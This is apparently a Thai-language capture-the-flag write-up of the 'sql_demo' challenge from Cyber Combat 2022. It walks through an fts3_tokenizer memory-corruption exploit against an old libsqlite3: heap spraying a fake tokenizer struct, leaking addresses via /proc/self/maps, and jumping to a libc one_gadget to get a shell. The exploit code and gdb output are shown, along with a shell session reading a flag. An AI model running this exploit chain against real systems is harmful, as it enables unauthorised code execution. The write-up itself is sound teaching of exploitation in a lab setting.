July 24, 2022

Cyber Combat 2022 (Final) - sql_demo

Cover

ได้มีโอกาศไปแข่งขัน Cyber Combat 2022 ของทาง TB-CERT ทีมชื่อ ANYA (อาเนีย ไม่ใช่ อันย่า) และมีโจทย์ข้อหนึ่งที่ทำเสร็จหลังงานจบไปนิดเดียว ด้วยความเสียดายเลยนำมาเขียน blog ซะเลย

โดยโจทย์ข้อนี้เท่าที่ลองทดลองทำดูจะเป็นโจทย์ Memory Corruption หรือโจทย์ PWN ข้อหนึ่ง ซึ้งหลุดจากข้ออื่น ๆ ไปมากชื่อว่า sql_demo โดยตัวโจทย์จะเป็นภาษา Python และมีเนื้อหาดังนี้

#!/usr/bin/env python2

import ctypes
import sys
#import os

SQLITE_OK = 0

@ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_void_p, ctypes.c_int, ctypes.POINTER(ctypes.c_char_p), ctypes.POINTER(ctypes.c_char_p))
def callback(not_used, argc, argv, col_names):
  values = []
  for i in range(0, argc):
    values.append(argv[i])
  print("|%s|" % '|'.join(values))
  return 0

libsqlite = ctypes.cdll.LoadLibrary("libsqlite3.so.0")

db = ctypes.c_void_p(0)
err_msg = ctypes.c_char_p(0)

rc = libsqlite.sqlite3_open(":memory:", ctypes.byref(db))
if rc != SQLITE_OK:
  print("Can't open database")
  libsqlite.sqlite3_close(db)
  sys.exit(-1)

while True:
  print('>'),
  sql = raw_input()

  if sql == '.quit':
    libsqlite.sqlite3_free(err_msg);
    libsqlite.sqlite3_close(db);
    sys.exit(0);

  if sql == '.thumbprint':
    print(id(__doc__))
    print("%02x%02x" % (db.value ^ ctypes.cast(libsqlite.sqlite3_exec, ctypes.c_void_p).value, db.value ^ id(__doc__)))
    continue

  if sql.startswith('.read'):
    try:
      with open(sql[6:].strip(), "r") as f:
        for line in f:
          print(line),
    except:
      print("E! Can't read file")
    continue

  rc = libsqlite.sqlite3_exec(db, sql, callback, 0, ctypes.byref(err_msg))
  if rc != SQLITE_OK:
    print("E! %s" % err_msg.value);

จะเห็นว่าโจทย์ไม่ได้มีอะไรแปลกมากจะเป็นการ load libsqlite3.so.0 และใช้งาน sqlite3_exec() function โดยตรง และการแข่งขันครั้งนี้เป็น การแข่งขันแบบ Attack & Defense โดยที่ flag จะถูกนำไปเขียนเป็นไฟล์​ไว้ใน /data โดยที่ชื่อไฟล์ไม่สามารถเดาได้

จากการ research ไม่พบ function default ของ sqlite ที่จะสามารถ list directory ได้ (ติดหาเรื่องนี้นานมาก) หลังจากเริ่มปลง ผมจึงเริ่มไปลองหาช่องโหว่จากช่องทางอื่น และไปเห็นที่ตัวโจทย์ตั้งใจ โหลดตัว libsqlite3.so.0 lib เข้ามาใช้งานซึ่งฝืนมาก ผมจึงเข้าไปใน docker โจทย์ใน instance ตัวเองเพื่อดู version ของ sqlite lib

root@team3:~# docker exec -ti -u root sql_demo bash
root@56bddfab4226:/data# ls -al /usr/lib/x86_64-linux-gnu/libsqlite3.so.0
lrwxrwxrwx 1 root root 19 Feb 24 2021 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0 -> libsqlite3.so.0.8.6

จากที่เห็นเป็น libsqlite3 version 0.8.6 ค้นไปค้นมา เจอ blog นี้ซึ่งตรง version กับโจทย์พอดีเปะ ๆ และใน blog อธิบายวิธีโจมตีมาอย่างละเอียดแล้ว โดยสรุปเลยคือ ถ้าเราเรียก function fts3_tokenizer() และใส่ argument ที่ 2 เป็น address ของ object sqlite3_tokenizer_module ที่เราปลอมขึ้นมาได้ มันจะสร้าง sqlite3_tokenizer_module object ที่ชี้ไปที่ address นั้นจริง ๆ ทำให้เราสามารถ ชี้ไปที่ malicious address ที่เราเตรียมไว้ จากนั้น call function pointer xCreate, xDestroy, xOpen, xClose หรือ xNext ของ object นั้น เพื่อ take over control flow

sqlite3_tokenizer_module Object Schema

struct sqlite3_tokenizer_module {
  int iVersion;
  int (*xCreate) (int argc, const char * const *argv, sqlite3_tokenizer **ppTokenizer);
  int (*xDestroy) (sqlite3_tokenizer *pTokenizer);
  int (*xOpen) (sqlite3_tokenizer *pTokenizer, const char *pInput, int nBytes, sqlite3_tokenizer_cursor **ppCursor);
  int (*xClose) (sqlite3_tokenizer_cursor *pCursor);
  int (*xNext) (sqlite3_tokenizer_cursor *pCursor, const char **ppToken, int *pnBytes, int *piStartOffset, int *piEndOffset, int *piPosition);
};

ดังนั้นปัญหาของเราตอนนี้คือ เราจะเอา object sqlite3_tokenizer_module ปลอมไปใส่ไว้ใน memory ยังไง จากการทดลองพบว่า เราสามารถ select string ที่เราต้องการแล้วมันจะไปอยู่ใน memory ส่วนของ heap เอง แต่ว่าเราต้อง select ยาว ๆ หน่อยเพราะว่าต้น ๆ จะถูก overwrite ได้จากคำสั่งอื่น ๆ หลังจาก payload ของเราถูก free ผมจึงเลือกใช้

select replace(hex(zeroblob(1000)), '00', 'ANYA')

Ref: https://stackoverflow.com/a/51792334

และอีกความยากคือ ASLR ของ Linux ที่เราจำเป็นจะต้อง bypass เช่นกัน ASLR โดยเบื่องต้นจะเป็นการ random base memory ของแต่ละ segment ทำให้เราไม่สามารถเดาได้ว่าข้อมูลที่เราใส่เข้าไปเยอะ ๆ ใน heap อยู่ตรงไหน

แต่เดียวก่อนเรามี .read ที่สามารถนำไปอ่าน /proc/self/maps file โดยด้านใน file นี้จะมี memory mapping ของแต่ละ segment อยู่ด้วยทำให้เราสามารถ bypass ASLR ได้อย่างง่ายดาย ดังรูปต่อไปนี้

.read

จากนั้นเราก็แค่ต้องเขียน script เพื่อเข้าไปอ่าน เช่น

def execute(sql, last=False):
  global s
  s.sendline(sql)
  return s.readuntil("> ")

s = Sock(host, 1433)
s.readuntil(">")

s.sendline(".read /proc/self/maps")
maps = s.readuntil("> ")[:-2].splitlines()
libc_addr = int(maps[23][:12], 16)
heap_addr = int(maps[6][:12], 16)

ต่อไปเราก็ทำการยัด malicious sqlite3_tokenizer_module object ใส่ heap ซะดัง script ต่อไปนี้ (ไม่รู้ต้อง jmp ไปไหน ให้ไป 0xdeadbeef ก่อนเลย)

spawn_shell_addr = 0xdeadbeef

shell_struct = struct.pack("<Q", 0)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)

execute(f"select replace(hex(zeroblob(31337)), '00', x'414E5941414E5941{shell_struct.hex()}414E5941414E5941');")

หลังจากยัดใส่ไปแล้วเราจะรู้ได้ยังไง ว่ามันอยู่ตรงไหนของ heap วิธีของผมคือเข้าไป debug ใน container โจทย์เลยจบ ๆ ไป (ก่อนเข้าไปดู ให้ยิง step ด้านบนและเปิด connection ค้างไว้ก่อน) ดังนี้

root@team3:~# docker exec -ti -u root sql_demo bash
root@56bddfab4226:/data# apt install procps gdb
root@56bddfab4226:/data# ps -A
  PID TTY     TIME CMD
   1 ?    00:00:00 sh
   7 ?    00:00:00 socat
  2812 pts/2  00:00:00 bash
  2839 pts/0  00:00:00 bash
  2897 ?    00:00:00 socat
  2898 ?    00:00:00 python
  2902 ?    00:00:00 socat
  2903 ?    00:00:00 python
  2904 pts/0  00:00:00 ps

เราได้ target process id (2903) แล้ว จากนั้น debug เลย โดยใช้ gdb -q -p 2903 attach เข้าไปใน process (ห้ามลืมใส่ ptrace CAP ให้ container ใน docker-compose.yml ด้วยนะ) จากนั้น ดู memory map ก่อนเลยใช้ คำสั่ง i proc mapping

root@56bddfab4226:/data# gdb -q -p 2903
Attaching to process 2903
(gdb) i proc mapping
process 2903
Mapped address spaces:

     Start Addr      End Addr    Size   Offset objfile
   0x55e689a3a000   0x55e689a87000  0x4d000    0x0 /usr/bin/python2.7
   0x55e689a87000   0x55e689c1c000  0x195000  0x4d000 /usr/bin/python2.7
   0x55e689c1c000   0x55e689d31000  0x115000  0x1e2000 /usr/bin/python2.7
   0x55e689d32000   0x55e689d34000   0x2000  0x2f7000 /usr/bin/python2.7
   0x55e689d34000   0x55e689dab000  0x77000  0x2f9000 /usr/bin/python2.7
   0x55e689dab000   0x55e689dce000  0x23000    0x0
   0x55e68b514000   0x55e68b63a000  0x126000    0x0 [heap]
   0x7f6665121000   0x7f6665131000  0x10000    0x0 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
   0x7f6665131000   0x7f6665229000  0xf8000  0x10000 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
   0x7f6665229000   0x7f666525d000  0x34000  0x108000 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
   0x7f666525d000   0x7f6665261000   0x4000  0x13b000 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
   0x7f6665261000   0x7f6665264000   0x3000  0x13f000 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
   0x7f6665264000   0x7f6665266000   0x2000    0x0 /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
   0x7f6665266000   0x7f666526c000   0x6000   0x2000 /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
   0x7f666526c000   0x7f666526e000   0x2000   0x8000 /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
   0x7f666526e000   0x7f666526f000   0x1000   0x9000 /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
   0x7f666526f000   0x7f6665270000   0x1000   0xa000 /usr/lib/x86_64-linux-gnu/libffi.so.7.1.0
   0x7f6665270000   0x7f6665277000   0x7000    0x0 /usr/lib/python2.7/lib-dynload/_ctypes.x86_64-linux-gnu.so
   0x7f6665277000   0x7f6665286000   0xf000   0x7000 /usr/lib/python2.7/lib-dynload/_ctypes.x86_64-linux-gnu.so
[...]

จะเจอว่า heap อยู่ที่ 0x55e68b514000 ถึง 0x55e68b63a000 ก็ค้นหาคำว่า ANYAANYA ที่เราใส่เป็น prefix และ postfix ก่อนเลย ใช้ find ดังต่อไปนี้

(gdb) find 0x55e68b514000,0x55e68b63a000,"ANYAANYA"
0x55e68b5d4288
0x55e68b5d42c0
0x55e68b619928
[...]
0x55e68b635fe8
0x55e68b636028
0x55e68b636068
0x55e68b6360a8
0x55e68b6360e8
0x55e68b636128
0x55e68b636168
0x55e68b6361a8
warning: Unable to access 15960 bytes of target memory at 0x55e68b63

จะเจอ address ที่มีค่าเป็น ANYAANYA แล้ว จากนั้นให้ใช้อันท้าย ๆ เพราะว่าจะมีโอกาศภูก overwrite ยาก ลองส่องดูว่าตรงกับ struct ที่เรายัดไว้ไหม

(gdb) x/20xg 0x55e68b6361a8 - 48
0x55e68b636178: 0x00000000deadbeef 0x00000000deadbeef
0x55e68b636188: 0x00000000deadbeef 0x00000000deadbeef
0x55e68b636198: 0x00000000deadbeef 0x41594e4141594e41
0x55e68b6361a8: 0x41594e4141594e41 0x0000000000000000
0x55e68b6361b8: 0x00000000deadbeef 0x00000000deadbeef
0x55e68b6361c8: 0x00000000deadbeef 0x00000000deadbeef
0x55e68b6361d8: 0x00000000deadbeef 0x41594e4141594e41
0x55e68b6361e8: 0x41594e4141594e41 0x0000000000000000
0x55e68b6361f8: 0x00000000deadbeef 0x00000000deadbeef
0x55e68b636208: 0x00000000deadbeef 0x00000000deadbeef
(gdb) x/6xg 0x55e68b6361b0
0x55e68b6361b0: 0x0000000000000000 0x00000000deadbeef
0x55e68b6361c0: 0x00000000deadbeef 0x00000000deadbeef
0x55e68b6361d0: 0x00000000deadbeef 0x00000000deadbeef

ตรงจากนั้นก็หา offset ระหว่าง base heap และตัว object ของเราซะ (แนะนำว่าให้เป็นอันท้าย ๆ เพราะจะได้ไม่ถูก overwrite ผมติดตรงนี้นานมาก มารู้ทีหลังว่ามันโดนคำสั่งอื่นแย่งไปใช้ได้)

(gdb) p/x 0x55e68b6361b0 - 0x55e68b514000
$1 = 0x1221b0

หลังจากได้ offset แล้วก็ยัดเข้า function fts3_tokenizer() เลยดังนี้

# Calc from GDB
heap_offset = 0x1221b0
shell_struct_addr = heap_addr + heap_offset
print("Struct Addr:", hex(shell_struct_addr))
shell_struct_addr_hex = struct.pack("<Q", shell_struct_addr).hex()

execute(f"select hex(fts3_tokenizer('shell', x'{shell_struct_addr_hex}'));")

สุดท้ายก็แค่ trick ให้ sqlite เรียก function xCreate ก็พอแล้ว เราก็จะ take over control flow ไปที่ 0xdeadbeef ได้แล้ว

s.sendline('create virtual table shell using fts3(tokenize=shell);')
s.interactive()

ลอง debug ดูเหมือนเดิม เรียบร้อยเด้งไป 0xdeadbeaf แล้ว

root@56bddfab4226:/data# ps -A
  PID TTY     TIME CMD
   1 ?    00:00:00 sh
   7 ?    00:00:00 socat
  2812 pts/2  00:00:00 bash
  2839 pts/0  00:00:00 bash
  2897 ?    00:00:00 socat
  2898 ?    00:00:00 python
  2918 ?    00:00:00 socat
  2919 ?    00:00:00 python
  2942 ?    00:00:00 socat
  2943 ?    00:00:00 python
  2944 pts/0  00:00:00 ps
root@56bddfab4226:/data# gdb -q -p 2943
Attaching to process 2943
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00000000deadbeef in ?? ()

ปัญหาสุดท้ายแล้วต้อง jump ไปไหนหละถึงจะได้ shell พอถึงตรงนี้ก็ใกล้จบงานแล้ว เลยปลงไม่ได้ตั้งใจทำต่อ

หลังจากตรงนี้จะเป็น work หลังจากจบงานนะครับ (เศร้ามาก)

หลังจากจบงาน พึ่งมานึกได้ว่าโลกนี้มี one_gadget นี้หว่า จัดดิครับ

FYI: one_gadget คือ address ที่เมื่อ jmp ไปแล้วจะได้ shell เลยครับ ผมใช้ (https://github.com/david942j/one_gadget)

docker cp sql_demo_test:/lib/x86_64-linux-gnu/libc-2.31.so .
root@team3:~# one_gadget libc-2.31.so
0xc96da execve("/bin/sh", r12, r13)
constraints:
 [r12] == NULL || r12 == NULL
 [r13] == NULL || r13 == NULL

0xc96dd execve("/bin/sh", r12, rdx)
constraints:
 [r12] == NULL || r12 == NULL
 [rdx] == NULL || rdx == NULL

0xc96e0 execve("/bin/sh", rsi, rdx)
constraints:
 [rsi] == NULL || rsi == NULL
 [rdx] == NULL || rdx == NULL

เปลี่ยน spawn_shell_addr จาก 0xdeadbeef เป็น one gadget เลยครับ

spawn_shell_addr = libc_addr + 0xc96da

สุดท้ายทักทายทีม @Earth sec guys ซักหน่อย และได้ flag (ทีม @Earch อยู่ที่ 10.60.6.3 นะครับ)

bongtrop@Pongsakorns-MacBook-Pro:client/ (master~) $ MY_IP=10.60.6.3 python spl_sql_demo_test_2.py
Start Exploit !
Local Test
Target: 10.60.6.3
Struct Addr: 0x55becfd6d1b0
: 0: can't access tty; job control turned off
$ id
uid=101(sql) gid=65534(nogroup) groups=65534(nogroup)
$ ls -alt | head
total 424
drwxr-xr-x 2 sql root  4096 Sep 22 07:59 .
-rw-r--r-- 1 sql nogroup 8192 Sep 22 07:59 uw09-9yv8-qs65
-rw-r--r-- 1 sql nogroup 8192 Sep 22 07:58 4585-kb5e-5ri7
-rw-r--r-- 1 sql nogroup 8192 Sep 22 07:57 8ltp-yr53-tewb
-rw-r--r-- 1 sql nogroup 8192 Sep 22 07:56 svv7-bshi-1lw9
-rw-r--r-- 1 sql nogroup 8192 Sep 22 07:55 o51r-r4a8-lbco
-rw-r--r-- 1 sql nogroup  0 Sep 22 07:54 3uqm-ysiy-sst4
-rw-r--r-- 1 sql nogroup 8192 Sep 22 07:53 zzxu-jp8z-7i32
-rw-r--r-- 1 sql nogroup 8192 Sep 22 07:52 x7tb-3dbx-t6ca
$ cat uw09-9yv8-qs65
*]TEAM006_K9QOMEZO1X95CEA7978J2M30AE4C382D$ xt NOT NULL)

เสียดายไม่ได้ก่อนงานจบ อยาก “เซ็ตหย่อ สูดตอ ซูดผ่อ สี่หม่อ สองห่อ ใส่ไข่” เครื่อง @Earth จังครับ

สำหรับ exploit ตัวเต็มดูได้จาก https://gist.github.com/bongtrop/b75071bd82b78869470caa17d30e40e2

สรุป

ไม่รู้โจทย์ข้อนี้มันโผล่มาได้ไง ความยากคือต่างจากข้ออื่นลิบลับเลย แต่สนุกมากครับ สนุกที่ข้อนี้แหละ